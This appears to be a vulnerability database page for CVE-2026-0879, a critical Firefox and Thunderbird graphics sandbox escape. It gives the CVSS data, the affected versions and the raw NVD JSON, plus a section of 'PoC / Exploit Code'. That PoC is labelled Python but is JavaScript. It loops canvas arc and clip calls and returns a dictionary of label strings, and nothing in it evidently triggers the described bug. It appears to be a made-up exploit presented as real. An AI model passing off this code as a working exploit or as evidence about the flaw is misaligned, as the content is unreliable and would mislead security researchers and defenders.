Security Vulnerability Report
中文
CVE-2026-0879 CVSS 9.8 CRITICAL

CVE-2026-0879

Published: 2026-01-13 14:16:38
Last Modified: 2026-04-13 15:17:17
Source: [email protected]

Description

Sandbox escape due to incorrect boundary conditions in the Graphics component. This vulnerability was fixed in Firefox 147, Firefox ESR 115.32, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 147
Mozilla Firefox ESR 115.x < 115.32
Mozilla Firefox ESR 140.x < 140.7
Mozilla Thunderbird < 147
Mozilla Thunderbird < 140.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-0879 PoC - Sandbox Escape via Graphics Component // This PoC demonstrates the boundary condition vulnerability // Note: This is a conceptual proof-of-concept for educational purposes only // Malicious payload structure for triggering the boundary condition bug function createExploitPayload() { // Stage 1: Prepare the malicious graphics context const canvas = document.createElement('canvas'); const ctx = canvas.getContext('2d'); // Stage 2: Craft specific drawing operations that trigger the boundary check bypass // The vulnerability allows bypassing boundary conditions in Graphics component const maliciousData = { type: 'sandbox_escape_trigger', cve_id: 'CVE-2026-0879', component: 'Graphics', trigger: 'incorrect_boundary_conditions' }; // Stage 3: Execute the crafted graphics operations for (let i = 0; i < 0xFFFF; i++) { ctx.beginPath(); ctx.arc(0, 0, i, 0, Math.PI * 2); ctx.clip(); // This specific pattern triggers the boundary condition vulnerability } return maliciousData; } // Trigger the exploit try { createExploitPayload(); console.log('PoC executed - vulnerability trigger attempted'); } catch (e) { console.error('Exploit error:', e); } // Note: Actual exploitation requires specific Mozilla Firefox/Thunderbird versions // and specific memory layout conditions. This PoC is for research purposes.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0879", "sourceIdentifier": "[email protected]", "published": "2026-01-13T14:16:38.463", "lastModified": "2026-04-13T15:17:16.533", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sandbox escape due to incorrect boundary conditions in the Graphics component. This vulnerability was fixed in Firefox 147, Firefox ESR 115.32, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7."}, {"lang": "es", "value": "Escape de sandbox debido a condiciones de contorno incorrectas en el componente de Gráficos. Esta vulnerabilidad afecta a Firefox &lt; 147, Firefox ESR &lt; 115.32, Firefox ESR &lt; 140.7, Thunderbird &lt; 147, y Thunderbird &lt; 140.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.32.0", "matchCriteriaId": "D7C58C67-2B8D-493D-8914-F407E35B348A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "E06AF540-011D-4249-9815-3A4609DD26D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "128.0", "versionEndExcluding": "140.7.0", "matchCriteriaId": "4FF5535D-A7D8-46C6-AA5A-8EB3762A9171"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.7.0", "matchCriteriaId": "BFBAB968-3244-4970-8D02-CCF9D5FB958D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "47B67C0A-B05F-4212-9255-0446302237A5"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2004602", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-01/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-02/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-03/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-04/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-05/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.